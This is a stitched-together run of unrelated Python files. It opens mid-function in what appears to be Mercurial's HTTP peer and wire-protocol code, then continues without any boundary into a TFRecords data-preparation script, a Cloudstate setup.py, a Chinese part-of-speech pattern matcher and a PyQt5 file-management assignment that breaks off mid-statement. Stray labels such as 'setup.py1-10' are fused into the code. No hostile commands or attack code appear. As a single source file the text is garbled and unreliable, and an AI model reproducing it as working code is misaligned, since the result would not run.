if postargsok and args: strargs = urlreq.urlencode(sorted(args.items())) if not data: data = strargs else: if isinstance(data, bytes): i = io.BytesIO(data) i.length = len(data) data = i argsio = io.BytesIO(strargs) argsio.length = len(strargs) data = _multifile(argsio, data) headers[r'X-HgArgs-Post'] = len(strargs) elif args: # Calling self.capable() can infinite loop if we are calling # "capabilities". But that command should never accept wire # protocol arguments. So this should never happen. assert cmd != 'capabilities' httpheader = capablefn('httpheader') if httpheader: headersize = int(httpheader.split(',', 1)[0]) # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. encargs = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders(encargs, 'X-HgArg', headersize): headers[header] = value # Send arguments via query string (Mercurial <1.9). else: q += sorted(args.items()) qs = '?%s' % urlreq.urlencode(q) cu = "%s%s" % (repobaseurl, qs) size = 0 if util.safehasattr(data, 'length'): size = data.length elif data is not None: size = len(data) if data is not None and r'Content-Type' not in headers: headers[r'Content-Type'] = r'application/mercurial-0.1' # Tell the server we accept application/mercurial-0.2 and multiple # compression formats if the server is capable of emitting those # payloads. # Note: Keep this set empty by default, as client advertisement of # protocol parameters should only occur after the handshake. protoparams = set() mediatypes = set() if caps is not None: mt = capablefn('httpmediatype') if mt: protoparams.add('0.1') mediatypes = set(mt.split(',')) protoparams.add('partial-pull') if '0.2tx' in mediatypes: protoparams.add('0.2') if '0.2tx' in mediatypes and capablefn('compression'): # We /could/ compare supported compression formats and prune # non-mutually supported or error if nothing is mutually supported. # For now, send the full list to the server and have it error. comps = [e.wireprotosupport().name for e in util.compengines.supportedwireengines(util.CLIENTROLE)] protoparams.add('comp=%s' % ','.join(comps)) if protoparams: protoheaders = encodevalueinheaders(' '.join(sorted(protoparams)), 'X-HgProto', headersize or 1024) for header, value in protoheaders: headers[header] = value varyheaders = [] for header in headers: if header.lower().startswith(r'x-hg'): varyheaders.append(header) if varyheaders: headers[r'Vary'] = r','.join(sorted(varyheaders)) req = requestbuilder(pycompat.strurl(cu), data, headers) if data is not None: ui.debug("sending %d bytes\n" % size) req.add_unredirected_header(r'Content-Length', r'%d' % size) return req, cu, qs def _reqdata(req): """Get request data, if any. If no data, returns None.""" if pycompat.ispy3: return req.data if not req.has_data(): return None return req.get_data() def sendrequest(ui, opener, req): """Send a prepared HTTP request. Returns the response object. """ dbg = ui.debug if (ui.debugflag and ui.configbool('devel', 'debug.peer-request')): line = 'devel-peer-request: %s\n' dbg(line % '%s %s' % (pycompat.bytesurl(req.get_method()), pycompat.bytesurl(req.get_full_url()))) hgargssize = None for header, value in sorted(req.header_items()): header = pycompat.bytesurl(header) value = pycompat.bytesurl(value) if header.startswith('X-hgarg-'): if hgargssize is None: hgargssize = 0 hgargssize += len(value) else: dbg(line % ' %s %s' % (header, value)) if hgargssize is not None: dbg(line % ' %d bytes of commands arguments in headers' % hgargssize) data = _reqdata(req) if data is not None: length = getattr(data, 'length', None) if length is None: length = len(data) dbg(line % ' %d bytes of data' % length) start = util.timer() res = None try: res = opener.open(req) except urlerr.httperror as inst: if inst.code == 401: raise error.Abort(_('authorization failed')) raise except httplib.HTTPException as inst: ui.debug('http error requesting %s\n' % util.hidepassword(req.get_full_url())) ui.traceback() raise IOError(None, inst) finally: if ui.debugflag and ui.configbool('devel', 'debug.peer-request'): code = res.code if res else -1 dbg(line % ' finished in %.4f seconds (%d)' % (util.timer() - start, code)) # Insert error handlers for common I/O failures. urlmod.wrapresponse(res) return res class RedirectedRepoError(error.RepoError): def __init__(self, msg, respurl): super(RedirectedRepoError, self).__init__(msg) self.respurl = respurl def parsev1commandresponse(ui, baseurl, requrl, qs, resp, compressible, allowcbor=False): # record the url we got redirected to redirected = False respurl = pycompat.bytesurl(resp.geturl()) if respurl.endswith(qs): respurl = respurl[:-len(qs)] qsdropped = False else: qsdropped = True if baseurl.rstrip('/') != respurl.rstrip('/'): redirected = True if not ui.quiet: ui.warn(_('real URL is %s\n') % respurl) try: proto = pycompat.bytesurl(resp.getheader(r'content-type', r'')) except AttributeError: proto = pycompat.bytesurl(resp.headers.get(r'content-type', r'')) safeurl = util.hidepassword(baseurl) if proto.startswith('application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith('application/mercurial-'): ui.debug("requested URL: '%s'\n" % util.hidepassword(requrl)) msg = _("'%s' does not appear to be an hg repository:\n" "---%%<--- (%s)\n%s\n---%%<---\n") % ( safeurl, proto or 'no content-type', resp.read(1024)) # Some servers may strip the query string from the redirect. We # raise a special error type so callers can react to this specially. if redirected and qsdropped: raise RedirectedRepoError(msg, respurl) else: raise error.RepoError(msg) try: subtype = proto.split('-', 1)[1] # Unless we end up supporting CBOR in the legacy wire protocol, # this should ONLY be encountered for the initial capabilities # request during handshake. if subtype == 'cbor': if allowcbor: return respurl, proto, resp else: raise error.RepoError(_('unexpected CBOR response from ' 'server')) version_info = tuple([int(n) for n in subtype.split('.')]) except ValueError: raise error.RepoError(_("'%s' sent a broken Content-Type " "header (%s)") % (safeurl, proto)) # TODO consider switching to a decompression reader that uses # generators. if version_info == (0, 1): if compressible: resp = util.compengines['zlib'].decompressorreader(resp) elif version_info == (0, 2): # application/mercurial-0.2 always identifies the compression # engine in the payload header. elen = struct.unpack('B', util.readexactly(resp, 1))[0] ename = util.readexactly(resp, elen) engine = util.compengines.forwiretype(ename) resp = engine.decompressorreader(resp) else: raise error.RepoError(_("'%s' uses newer protocol %s") % (safeurl, subtype)) return respurl, proto, resp class httppeer(wireprotov1peer.wirepeer): def __init__(self, ui, path, url, opener, requestbuilder, caps): self.ui = ui self._path = path self._url = url self._caps = caps self._urlopener = opener self._requestbuilder = requestbuilder def __del__(self): for h in self._urlopener.handlers: h.close() getattr(h, "close_all", lambda: None)() # Begin of ipeerconnection interface. def url(self): return self._path def local(self): return None def peer(self): return self def canpush(self): return True def close(self): try: reqs, sent, recv = (self._urlopener.requestscount, self._urlopener.sentbytescount, self._urlopener.receivedbytescount) except AttributeError: return self.ui.note(_('(sent %d HTTP requests and %d bytes; ' 'received %d bytes in responses)\n') % (reqs, sent, recv)) # End of ipeerconnection interface. # Begin of ipeercommands interface. def capabilities(self): return self._caps # End of ipeercommands interface. def _callstream(self, cmd, _compressible=False, **args): args = pycompat.byteskwargs(args) req, cu, qs = makev1commandrequest(self.ui, self._requestbuilder, self._caps, self.capable, self._url, cmd, args) resp = sendrequest(self.ui, self._urlopener, req) self._url, ct, resp = parsev1commandresponse(self.ui, self._url, cu, qs, resp, _compressible) return resp def _call(self, cmd, **args): fp = self._callstream(cmd, **args) try: return fp.read() finally: # if using keepalive, allow connection to be reused fp.close() def _callpush(self, cmd, cg, **args): # have to stream bundle to a temp file because we do not have # http 1.1 chunked transfer. types = self.capable('unbundle') try: types = types.split(',') except AttributeError: # servers older than d1b16a746db6 will send 'unbundle' as a # boolean capability. They only support headerless/uncompressed # bundles. types = [""] for x in types: if x in bundle2.bundletypes: type = x break tempname = bundle2.writebundle(self.ui, cg, None, type) fp = httpconnection.httpsendfile(self.ui, tempname, "rb") headers = {r'Content-Type': r'application/mercurial-0.1'} try: r = self._call(cmd, data=fp, headers=headers, **args) vals = r.split('\n', 1) if len(vals) < 2: raise error.ResponseError(_("unexpected response:"), r) return vals except urlerr.httperror: # Catch and re-raise these so we don't try and treat them # like generic socket errors. They lack any values in # .args on Python 3 which breaks our socket.error block. raise except socket.error as err: if err.args[0] in (errno.ECONNRESET, errno.EPIPE): raise error.Abort(_('push failed: %s') % err.args[1]) raise error.Abort(err.args[1]) finally: fp.close() os.unlink(tempname) def _calltwowaystream(self, cmd, fp, **args): fh = None fp_ = None filename = None try: # dump bundle to disk fd, filename = pycompat.mkstemp(prefix="hg-bundle-", suffix=".hg") fh = os.fdopen(fd, r"wb") d = fp.read(4096) while d: fh.write(d) d = fp.read(4096) fh.close() # start http push fp_ = httpconnection.httpsendfile(self.ui, filename, "rb") headers = {r'Content-Type': r'application/mercurial-0.1'} return self._callstream(cmd, data=fp_, headers=headers, **args) finally: if fp_ is not None: fp_.close() if fh is not None: fh.close() os.unlink(filename) def _callcompressable(self, cmd, **args): return self._callstream(cmd, _compressible=True, **args) def _abort(self, exception): raise exception def sendv2request(ui, opener, requestbuilder, apiurl, permission, requests, redirect): wireprotoframing.populatestreamencoders() uiencoders = ui.configlist(b'experimental', b'httppeer.v2-encoder-order') if uiencoders: encoders = [] for encoder in uiencoders: if encoder not in wireprotoframing.STREAM_ENCODERS: ui.warn(_(b'wire protocol version 2 encoder referenced in ' b'config (%s) is not known; ignoring\n') % encoder) else: encoders.append(encoder) else: encoders = wireprotoframing.STREAM_ENCODERS_ORDER reactor = wireprotoframing.clientreactor(ui, hasmultiplesend=False, buffersends=True, clientcontentencoders=encoders) handler = wireprotov2peer.clienthandler(ui, reactor, opener=opener, requestbuilder=requestbuilder) url = '%s/%s' % (apiurl, permission) if len(requests) > 1: url += '/multirequest' else: url += '/%s' % requests[0][0] ui.debug('sending %d commands\n' % len(requests)) for command, args, f in requests: ui.debug('sending command %s: %s\n' % ( command, stringutil.pprint(args, indent=2))) assert not list(handler.callcommand(command, args, f, redirect=redirect)) # TODO stream this. body = b''.join(map(bytes, handler.flushcommands())) # TODO modify user-agent to reflect v2 headers = { r'Accept': wireprotov2server.FRAMINGTYPE, r'Content-Type': wireprotov2server.FRAMINGTYPE, } req = requestbuilder(pycompat.strurl(url), body, headers) req.add_unredirected_header(r'Content-Length', r'%d' % len(body)) try: res = opener.open(req) except urlerr.httperror as e: if e.code == 401: raise error.Abort(_('authorization failed')) raise except httplib.HTTPException as e: ui.traceback() raise IOError(None, e) return handler, res class queuedcommandfuture(pycompat.futures.Future): """Wraps result() on command futures to trigger submission on call.""" def result(self, timeout=None): if self.done(): return pycompat.futures.Future.result(self, timeout) self._peerexecutor.sendcommands() # sendcommands() will restore the original __class__ and self.result # will resolve to Future.result. return self.result(timeout) @interfaceutil.implementer(repository.ipeercommandexecutor) class httpv2executor(object): def __init__(self, ui, opener, requestbuilder, apiurl, descriptor, redirect): self._ui = ui self._opener = opener self._requestbuilder = requestbuilder self._apiurl = apiurl self._descriptor = descriptor self._redirect = redirect self._sent = False self._closed = False self._neededpermissions = set() self._calls = [] self._futures = weakref.WeakSet() self._responseexecutor = None self._responsef = None def __enter__(self): return self def __exit__(self, exctype, excvalue, exctb): self.close() def callcommand(self, command, args): if self._sent: raise error.ProgrammingError('callcommand() cannot be used after ' 'commands are sent') if self._closed: raise error.ProgrammingError('callcommand() cannot be used after ' 'close()') # The service advertises which commands are available. So if we attempt # to call an unknown command or pass an unknown argument, we can screen # for this. if command not in self._descriptor['commands']: raise error.ProgrammingError( 'wire protocol command %s is not available' % command) cmdinfo = self._descriptor['commands'][command] unknownargs = set(args.keys()) - set(cmdinfo.get('args', {})) if unknownargs: raise error.ProgrammingError( 'wire protocol command %s does not accept argument: %s' % ( command, ', '.join(sorted(unknownargs)))) self._neededpermissions |= set(cmdinfo['permissions']) # TODO we /could/ also validate types here, since the API descriptor # includes types... f = pycompat.futures.Future() # Monkeypatch it so result() triggers sendcommands(), otherwise result() # could deadlock. f.__class__ = queuedcommandfuture f._peerexecutor = self self._futures.add(f) self._calls.append((command, args, f)) return f def sendcommands(self): if self._sent: return if not self._calls: return self._sent = True # Unhack any future types so caller sees a clean type and so we # break reference cycle. for f in self._futures: if isinstance(f, queuedcommandfuture): f.__class__ = pycompat.futures.Future f._peerexecutor = None # Mark the future as running and filter out cancelled futures. calls = [(command, args, f) for command, args, f in self._calls if f.set_running_or_notify_cancel()] # Clear out references, prevent improper object usage. self._calls = None if not calls: return permissions = set(self._neededpermissions) if 'push' in permissions and 'pull' in permissions: permissions.remove('pull') if len(permissions) > 1: raise error.RepoError(_('cannot make request requiring multiple ' 'permissions: %s') % _(', ').join(sorted(permissions))) permission = { 'push': 'rw', 'pull': 'ro', }[permissions.pop()] handler, resp = sendv2request( self._ui, self._opener, self._requestbuilder, self._apiurl, permission, calls, self._redirect) # TODO we probably want to validate the HTTP code, media type, etc. self._responseexecutor = pycompat.futures.ThreadPoolExecutor(1) self._responsef = self._responseexecutor.submit(self._handleresponse, handler, resp) def close(self): if self._closed: return self.sendcommands() self._closed = True if not self._responsef: return # TODO ^C here may not result in immediate program termination. try: self._responsef.result() finally: self._responseexecutor.shutdown(wait=True) self._responsef = None self._responseexecutor = None # If any of our futures are still in progress, mark them as # errored, otherwise a result() could wait indefinitely. for f in self._futures: if not f.done(): f.set_exception(error.ResponseError( _('unfulfilled command response'))) self._futures = None def _handleresponse(self, handler, resp): # Called in a thread to read the response. while handler.readdata(resp): pass @interfaceutil.implementer(repository.ipeerv2) class httpv2peer(object): def __init__(self, ui, repourl, apipath, opener, requestbuilder, apidescriptor): self.ui = ui self.apidescriptor = apidescriptor if repourl.endswith('/'): repourl = repourl[:-1] self._url = repourl self._apipath = apipath self._apiurl = '%s/%s' % (repourl, apipath) self._opener = opener self._requestbuilder = requestbuilder self._redirect = wireprotov2peer.supportedredirects(ui, apidescriptor) # Start of ipeerconnection. def url(self): return self._url def local(self): return None def peer(self): return self def canpush(self): # TODO change once implemented. return False def close(self): self.ui.note(_('(sent %d HTTP requests and %d bytes; ' 'received %d bytes in responses)\n') % (self._opener.requestscount, self._opener.sentbytescount, self._opener.receivedbytescount)) # End of ipeerconnection. # Start of ipeercapabilities. def capable(self, name): # The capabilities used internally historically map to capabilities # advertised from the "capabilities" wire protocol command. However, # version 2 of that command works differently. # Maps to commands that are available. if name in ('branchmap', 'getbundle', 'known', 'lookup', 'pushkey'): return True # Other concepts. if name in ('bundle2'): return True # Alias command-* to presence of command of that name. if name.startswith('command-'): return name[len('command-'):] in self.apidescriptor['commands'] return False def requirecap(self, name, purpose): if self.capable(name): return raise error.CapabilityError( _('cannot %s; client or remote repository does not support the %r ' 'capability') % (purpose, name)) # End of ipeercapabilities. def _call(self, name, **args): with self.commandexecutor() as e: return e.callcommand(name, args).result() def commandexecutor(self): return httpv2executor(self.ui, self._opener, self._requestbuilder, self._apiurl, self.apidescriptor, self._redirect) # Registry of API service names to metadata about peers that handle it. # # The following keys are meaningful: # # init # Callable receiving (ui, repourl, servicepath, opener, requestbuilder, # apidescriptor) to create a peer. # # priority # Integer priority for the service. If we could choose from multiple # services, we choose the one with the highest priority. API_PEERS = { wireprototypes.HTTP_WIREPROTO_V2: { 'init': httpv2peer, 'priority': 50, }, } def performhandshake(ui, url, opener, requestbuilder): # The handshake is a request to the capabilities command. caps = None def capable(x): raise error.ProgrammingError('should not be called') args = {} # The client advertises support for newer protocols by adding an # X-HgUpgrade-* header with a list of supported APIs and an # X-HgProto-* header advertising which serializing formats it supports. # We only support the HTTP version 2 transport and CBOR responses for # now. advertisev2 = ui.configbool('experimental', 'httppeer.advertise-v2') if advertisev2: args['headers'] = { r'X-HgProto-1': r'cbor', } args['headers'].update( encodevalueinheaders(' '.join(sorted(API_PEERS)), 'X-HgUpgrade', # We don't know the header limit this early. # So make it small. 1024)) req, requrl, qs = makev1commandrequest(ui, requestbuilder, caps, capable, url, 'capabilities', args) resp = sendrequest(ui, opener, req) # The server may redirect us to the repo root, stripping the # ?cmd=capabilities query string from the URL. The server would likely # return HTML in this case and ``parsev1commandresponse()`` would raise. # We catch this special case and re-issue the capabilities request against # the new URL. # # We should ideally not do this, as a redirect that drops the query # string from the URL is arguably a server bug. (Garbage in, garbage out). # However, Mercurial clients for several years appeared to handle this # issue without behavior degradation. And according to issue 5860, it may # be a longstanding bug in some server implementations. So we allow a # redirect that drops the query string to "just work." try: respurl, ct, resp = parsev1commandresponse(ui, url, requrl, qs, resp, compressible=False, allowcbor=advertisev2) except RedirectedRepoError as e: req, requrl, qs = makev1commandrequest(ui, requestbuilder, caps, capable, e.respurl, 'capabilities', args) resp = sendrequest(ui, opener, req) respurl, ct, resp = parsev1commandresponse(ui, url, requrl, qs, resp, compressible=False, allowcbor=advertisev2) try: rawdata = resp.read() finally: resp.close() if not ct.startswith('application/mercurial-'): raise error.ProgrammingError('unexpected content-type: %s' % ct) if advertisev2: if ct == 'application/mercurial-cbor': try: info = cborutil.decodeall(rawdata)[0] except cborutil.CBORDecodeError: raise error.Abort(_('error decoding CBOR from remote server'), hint=_('try again and consider contacting ' 'the server operator')) # We got a legacy response. That's fine. elif ct in ('application/mercurial-0.1', 'application/mercurial-0.2'): info = { 'v1capabilities': set(rawdata.split()) } else: raise error.RepoError( _('unexpected response type from server: %s') % ct) else: info = { 'v1capabilities': set(rawdata.split()) } return respurl, info def makepeer(ui, path, opener=None, requestbuilder=urlreq.request): """Construct an appropriate HTTP peer instance. ``opener`` is an ``url.opener`` that should be used to establish connections, perform HTTP requests. ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ u = util.url(path) if u.query or u.fragment: raise error.Abort(_('unsupported URL component: "%s"') % (u.query or u.fragment)) # urllib cannot handle URLs with embedded user or passwd. url, authinfo = u.authinfo() ui.debug('using %s\n' % url) opener = opener or urlmod.opener(ui, authinfo) respurl, info = performhandshake(ui, url, opener, requestbuilder) # Given the intersection of APIs that both we and the server support, # sort by their advertised priority and pick the first one. # # TODO consider making this request-based and interface driven. For # example, the caller could say "I want a peer that does X." It's quite # possible that not all peers would do that. Since we know the service # capabilities, we could filter out services not meeting the # requirements. Possibly by consulting the interfaces defined by the # peer type. apipeerchoices = set(info.get('apis', {}).keys()) & set(API_PEERS.keys()) preferredchoices = sorted(apipeerchoices, key=lambda x: API_PEERS[x]['priority'], reverse=True) for service in preferredchoices: apipath = '%s/%s' % (info['apibase'].rstrip('/'), service) return API_PEERS[service]['init'](ui, respurl, apipath, opener, requestbuilder, info['apis'][service]) # Failed to construct an API peer. Fall back to legacy. return httppeer(ui, path, respurl, opener, requestbuilder, info['v1capabilities']) def instance(ui, path, create, intents=None, createopts=None): if create: raise error.Abort(_('cannot create new http repository')) try: if path.startswith('https:') and not urlmod.has_https: raise error.Abort(_('Python support for SSL and HTTPS ' 'is not installed')) inst = makepeer(ui, path) return inst except error.RepoError as httpexception: try: r = statichttprepo.instance(ui, "static-" + path, create) ui.note(_('(falling back to static-http)\n')) return r except error.RepoError: raise httpexception # use the original http RepoError instead import numpy as np import os import tensorflow as tf import tqdm import pdb import glob import time import sys import re import argparse import fastBPE import platform use_py3 = platform.python_version()[0] == '3' parser = argparse.ArgumentParser(description='TensorFlow code for creating TFRecords data') # required=True parser.add_argument('--text_file', type=str, default='moby_dick.txt', help='location of text file to convert to TFRecords') parser.add_argument('--control_code', type=str, default='Moby', help='control code to use for this file. must be in the vocabulary, else it will error out.') parser.add_argument('--sequence_len', type=int, default=256, help='sequence length of model being fine-tuned (256 or 512)') args = parser.parse_args() path_to_train_file = fname = args.text_file domain = [args.control_code] train_text = open(path_to_train_file, 'rb').read().decode(encoding='utf-8') bpe = fastBPE.fastBPE('../codes', '../vocab') tokenized_train_text = bpe.apply([train_text.encode('ascii', errors='ignore') if not use_py3 else train_text])[0] # will NOT work for non-English texts # if you want to run non-english text, please tokenize separately using ./fast applybpe and then run this script on the .bpe file with utf8 encoding tokenized_train_text = re.findall(r'\S+|\n', tokenized_train_text) tokenized_train_text = list(filter(lambda x: x != u'@@', tokenized_train_text)) # load the vocabulary from file vocab = open('../vocab').read().decode(encoding='utf-8').split('\n') if not use_py3 else open('../vocab', encoding='utf-8').read().split('\n') vocab = list(map(lambda x: x.split(' ')[0], vocab)) + [''] + ['\n'] print('{} unique words'.format(len(vocab))) if args.control_code not in vocab: print('Provided control code is not in the vocabulary') print('Please provide a different one; refer to the vocab file for allowable tokens') sys.exit(1) # Creating a mapping from unique characters to indices word2idx = {u: i for i, u in enumerate(vocab)} idx2word = np.array(vocab) seq_length = args.sequence_len-1 def numericalize(x): count = 0 for i in x: if i not in word2idx: print(i) count += 1 return count > 1, [word2idx.get(i, word2idx['']) for i in x] tfrecords_fname = fname.lower()+'.tfrecords' total = 0 skipped = 0 with tf.io.TFRecordWriter(tfrecords_fname) as writer: for i in tqdm.tqdm(range(0, len(tokenized_train_text), seq_length)): flag_input, inputs = numericalize(domain+tokenized_train_text[i:i+seq_length]) flag_output, outputs = numericalize(tokenized_train_text[i:i+seq_length+1]) total += 1 if flag_input or flag_output: skipped += 1 continue if len(inputs) != seq_length+1 or len(outputs) != seq_length+1: break example_proto = tf.train.Example(features=tf.train.Features(feature={'input': tf.train.Feature(int64_list=tf.train.Int64List(value=inputs)), 'output': tf.train.Feature(int64_list=tf.train.Int64List(value=outputs))})) writer.write(example_proto.SerializeToString()) print('Done') print('Skipped', skipped, 'of', total) setup.py1-10 """ Copyright 2020 Lightbend Inc. Licensed under the Apache License, Version 2.0. """ from setuptools import setup, find_packages # Load version in cloudstate package. exec(open('cloudstate/version.py').read()) version = __version__ name = 'cloudstate' print(f'package name: {name}, version: {version}', flush=True) setup(name=name, version=version, url='https://github.com/cloudstateio/python-support', license='Apache 2.0', description='Cloudstate Python Support Library', packages=find_packages(exclude=['tests', 'shoppingcart']), long_description=open('Description.md', 'r').read(), long_description_content_type='text/markdown', zip_safe=False) class PartCtr(object): def __init__(self) -> None: self._modes = [ {'mode': ['n', 'nd', 'u', 'a', 'n'], 'res':[(0, 1, '有', 3, 4), (3, 4, '在', 0, 1)]}, {'mode': ['n', 'nd', 'u', 'n'], 'res':[(0, 1, '有', 3), (3, '在', 0, 1)]}, {'mode': ['a', 'n', 'k', 'p', 'n', 'nd'], 'res':[(4, 5, '有', 0, 1, 2)]}, ] self._dataBase = [] def segment(self, asub, alist, wordlist): asubStr = '&'.join(asub) alistStr = '&'.join(alist) count = alistStr.count(asubStr) indices = [] res = [] startIndex = 0 for i in range(count): index = alistStr.find(asubStr, startIndex) listIndex = len(alistStr[:index].split('&')) - 1 indices.append(listIndex) startIndex += len(asubStr) for ii in indices: res.append(wordlist[ii: ii + len(asub)]) res = res if len(res) > 0 else None return res def useModeRes(self, modeRes, r): res = [] for rr in r: for mm in modeRes: sub = '' for m in mm: sub += rr[m] if type(m) == int else m res.append(sub) return res def validateMode(self, alist, wordlist): res = [] for m in self._modes: mode = m['mode'] r = self.segment(mode, alist, wordlist) if r: res += self.useModeRes(m['res'], r) return res partCtr = PartCtr()1-10 #!/usr/bin/python3 """ Last Modified: 2018/6/20 Author: 孙浩然 Description: File Management, Assignment for Operating System Storage: Total 2048 Bytes = 128 Blocks * 16 Bytes, Every char for 1 Bytes """ import sys, os from PyQt5.QtWidgets import (QApplication, QWidget, QInputDialog, QFileDialog, QLabel, QPushButton, QMessageBox, QMenu, QAction) from PyQt5 import QtCore import math, shutil class Block(): def __init__(self): self.str = '' self.next = -1 class Node(): # node for dir tree def __init__(self, name, fatherNode): self.father = fatherNode self.son = [] self.dirName = name self.fileList = [] # (fileName, startBlock) class FileManagement(QWidget): def __init__(self): super().__init__() self.PATH = '' # path to file management root self.FAT_Bitmap_list = [] self.ROOT = '' # file tree root self.pointer = '' self.currentBtn = [] self.HEIGHT = 20 self.LENGTH = 550 self.selectBtn = '' self.storageRemain = 2048 self.currentPath = '' self.initUI() self.initLogic() def initUI(self): infoWindow = QLabel(self) self.pathWindow = QLabel('PATH:', self) self.storageWindow = QLabel('Free:\n2048', self) infoTitle = QLabel(' 文件名 | 文件类型 | 起始块 | 大小', self) infoWindow.setObjectName('info') self.pathWindow.setObjectName('path') self.storageWindow.setObjectName('storage') infoTitle.setObjectName('infoTitle') infoWindow.setFixedSize(550, 300) self.pathWindow.setFixedWidth(300) infoTitle.setFixedSize(550, 20) infoWindow.move(25, 80) infoTitle.move(25, 80) self.pathWindow.move(55, 55) self.storageWindow.move(625, 120) # button func list formatBtn = QPushButton('格式化', self) backBtn = QPushButton('返回上一级', self) createFileBtn = QPushButton('创建文本文件', self) createDirBtn = QPushButton('创建子目录', self) quitBtn = QPushButton('保存并退出', self) selectFileBtn = QPushButton('选择工作目录', self) formatBtn.clicked.connect(self.formatAction) backBtn.clicked.connect(self.backAction) createFileBtn.clicked.connect(self.createTextFileAction) createDirBtn.clicked.connect(self.createDirAction) quitBtn.clicked.connect(self.writeIntoDisk) selectFileBtn.clicked.connect(self.selectFile) backBtn.move(50, 15) createFileBtn.move(180, 15) createDirBtn.move(320, 15) formatBtn.move(450, 15) selectFileBtn.move(600, 290) quitBtn.move(600, 330) quitBtn.setFixedSize(120, 32) self.loadQss() self.setGeometry(300, 200 ,750, 400) self.setWindowTitle('File Management') self.show() def initLogic(self): # init Menu self.popMenu = QMenu(self) openFileAction = QAction('打开', self) deletFileAction = QAction('删除', self) openFileAction.triggered.connect(self.openFileAction) deletFileAction.triggered.connect(self.deleteFileAction) self.popMenu.addAction(openFileAction) self.popMenu.addAction(deletFileAction) def refreshUI(self): # every file or Dir is a pushbtn, cause they will response to click event # the file or dir to be displayed are sons of the self.pointer and its fileList for btn in self.currentBtn: btn.deleteLater() self.currentBtn.clear() self.pathWindow.setText('PATH:' + self.currentPath) self.storageWindow.setText('Free:\n' + str(self.storageRemain)) count = 1 for file in self.pointer.son: # dir name = file.dirName + (18 - len(file.dirName)) * ' ' +'folder' btn = QLabel(name, self) btn.setFixedSize(self.LENGTH, self.HEIGHT) btn.setObjectName('current') btn.move(25, 80 + count * self.HEIGHT) btn.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) btn.customContextMenuRequested.connect(self.showPopMenu) btn.show() self.currentBtn.append(btn) count = count + 1 for file in self.pointer.fileList: name = str(file[0]) + (18 - len(file[0]))*' ' + 'textFile' + ' '*9 + str(file[1]) + (14 - math.ceil(file[1]/10))*' ' + str(self.getTextFileSize(file[1])) btn = QLabel(name, self) btn.setFixedSize(self.LENGTH, self.HEIGHT) btn.setObjectName('current') btn.move(25, 80 + count * self.HEIGHT) btn.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) btn.customContextMenuRequested.connect(self.showPopMenu) btn.show() self.currentBtn.append(btn) count = count + 1 def selectFile(self): self.PATH = QFileDialog.getExistingDirectory(self, 'Choose a file for File Management', '/home') # Add README before pop up # check wether the dir is empty before init!! if os.path.exists(self.PATH + '/.FAT_BitMap_list'): with open(self.PATH + '/.FAT_BitMap_list', 'r') as f: for line in f.readlines(): if len(line) == 1: # skip the last \n continue result = line.split() block = Block() if len(result)>1: block.next = int(result[0]) block.str = result[1] self.storageRemain -= 16 else: block.next = int(result[0]) block.str = '' self.FAT_Bitmap_list.append(block) self.ROOT = Node('Root' ,None) self.pointer = self.ROOT self.restoreFileTree(self.ROOT, self.PATH) self.refreshUI() else: # init for i in range(0, 128): block = Block() self.FAT_Bitmap_list.append(block) # init FAT_Bitmap_list self.ROOT = Node('Root' ,None) self.pointer = self.ROOT def restoreFileTree(self, dirNode, path): with open(os.path.join(path, '.index'), 'r') as f: for line in f.readlines(): tmp1, tmp2 = line.split() dirNode.fileList.append((tmp1, int(tmp2))) for file in os.listdir(path): if (file == '.index') or (file == '.FAT_BitMap_list') or ('.txt' in file): continue else: newNode = Node(file, dirNode) dirNode.son.append(newNode) self.restoreFileTree(newNode, os.path.join(path, file)) def loadQss(self): style_sheet = '' with open('./stylesheet.qss', 'r') as f: for line in f.readlines(): style_sheet += line self.setStyleSheet(style_sheet) def formatAction(self): # delete everything if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: self.pointer = self.ROOT self.deleteDir(self.ROOT) self.currentPath = '' self.refreshUI() def backAction(self): # go to its father node if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if self.pointer.father == None: QMessageBox.information(self, 'Warning', '您已经处于根目录了!') else: self.pointer = self.pointer.father pos = self.currentPath.rfind('/') self.currentPath = self.currentPath[0:pos] self.refreshUI() def createTextFileAction(self): if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: fileName, ok = QInputDialog.getText(self, 'Input Dialog', 'Please input new file name:') if ok and str(fileName).isalnum() and len(fileName) <= 10: mark = True for file in self.pointer.fileList: # look for duplicate name if file[0] == str(fileName): mark = False break # check for available space!! start = -1 for i in range(len(self.FAT_Bitmap_list)): if len(self.FAT_Bitmap_list[i].str) == 0: start = i break if mark: if start == -1: # limited space QMessageBox.information(self, 'Warning', '储存空间不足!') else: self.pointer.fileList.append((str(fileName) + '.txt', start)) self.refreshUI() else: # already exists QMessageBox.information(self, 'Warning', '该文本文件名已存在!') else: # Please input correct file name if '.txt' in str(fileName): QMessageBox.information(self, 'Warning', '文件名中无需含有.txt!') elif len(fileName) > 10: QMessageBox.information(self, 'Warning', '文件名长度应在10个字符以下!') else: QMessageBox.information(self, 'Warning', '请您输入正确的文本文件名!') def createDirAction(self): if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: dirName, ok = QInputDialog.getText(self, 'Input Dialog', 'Please input new directory name:') if ok and str(dirName).isalnum() and len(dirName) <= 10: mark = True for child in self.pointer.son: # check for duplicate name if child.dirName == str(dirName): mark = False break if mark: newNode = Node(str(dirName), self.pointer) self.pointer.son.append(newNode) self.refreshUI() # refresh UI else: QMessageBox.information(self, 'Warning', '该文件名已存在!') # directory already exits else: if len(dirName) > 10: QMessageBox.information(self, 'Warning', '文件名长度应在10个字符以下!') else: QMessageBox.information(self, 'Warning', '请您输入正确的文件名!') # Please input correct file name def openFileAction(self): # Action in popMenu self.selectBtn if self.ROOT == '': QMessageBox.information(self, 'Warning', '请先选择工作目录!') else: if '.txt' in self.selectBtn.text(): # file selectedFile = '' for file in self.pointer.fileList: if file[0] == self.selectBtn.text()[0:11].replace(' ', ''): # remember to parse filename selectedFile = file break originText = self.getText(selectedFile) # get whole text from blocks self.releaseTextFile(selectedFile[1]) text, ok = QInputDialog.getMultiLineText(self, '文本文件输入框', '请输入内容', 